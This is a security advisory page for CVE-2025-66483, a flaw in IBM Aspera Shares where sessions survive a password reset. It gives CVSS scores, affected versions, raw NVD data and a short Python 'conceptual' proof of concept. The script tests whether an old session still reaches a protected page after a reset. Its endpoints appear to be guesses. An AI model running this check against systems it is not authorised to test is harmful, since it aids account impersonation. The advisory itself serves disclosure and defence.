Security Vulnerability Report
中文
CVE-2025-66483 CVSS 6.3 MEDIUM

CVE-2025-66483

Published: 2026-04-01 23:17:02
Last Modified: 2026-04-06 16:20:54

Description

IBM Aspera Shares 1.9.9 through 1.11.0 does not invalidate session after a password reset which could allow an authenticated user to impersonate another user on the system.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:ibm:aspera_shares:*:-:*:*:*:*:*:* - VULNERABLE
IBM Aspera Shares 1.9.9
IBM Aspera Shares 1.10.0
IBM Aspera Shares 1.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Conceptual Proof of Concept for CVE-2025-66483 # This script demonstrates checking if a session remains valid after a password reset. target_url = "https://target-aspera-server.com" login_endpoint = f"{target_url}/login" reset_endpoint = f"{target_url}/api/reset_password" protected_resource = f"{target_url}/user/profile" session = requests.Session() # Step 1: Authenticate as a user credentials = {"username": "victim_user", "password": "oldPassword"} session.post(login_endpoint, data=credentials) print(f"[+] Logged in. Session Cookie: {session.cookies.get_dict()}") # Step 2: Simulate triggering a password reset (or admin reset) # In a real scenario, this might involve sending a specific API request reset_payload = {"user_id": "victim_user", "new_password": "newStrongPassword"} reset_response = session.post(reset_endpoint, data=reset_payload) if reset_response.status_code == 200: print("[+] Password reset request processed.") # Step 3: Attempt to access protected resource using the OLD session # If the vulnerability exists, the server accepts the old session cookie despite the password change. resource_response = session.get(protected_resource) if resource_response.status_code == 200: print("[!] VULNERABLE: The old session is still valid after password reset!") print(f"[!] Impersonation successful. Response: {resource_response.text[:100]}...") else: print("[-] Session invalidated correctly. Target is patched.") else: print("[-] Failed to trigger password reset.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66483", "sourceIdentifier": "[email protected]", "published": "2026-04-01T23:17:01.940", "lastModified": "2026-04-06T16:20:54.160", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Aspera Shares 1.9.9 through 1.11.0 does not invalidate session after a password reset which could allow an authenticated user to impersonate another user on the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:aspera_shares:*:-:*:*:*:*:*:*", "versionStartIncluding": "1.9.9", "versionEndIncluding": "1.11.0", "matchCriteriaId": "43D7FC27-FB60-411F-A477-5D21D30548C3"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7267848", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}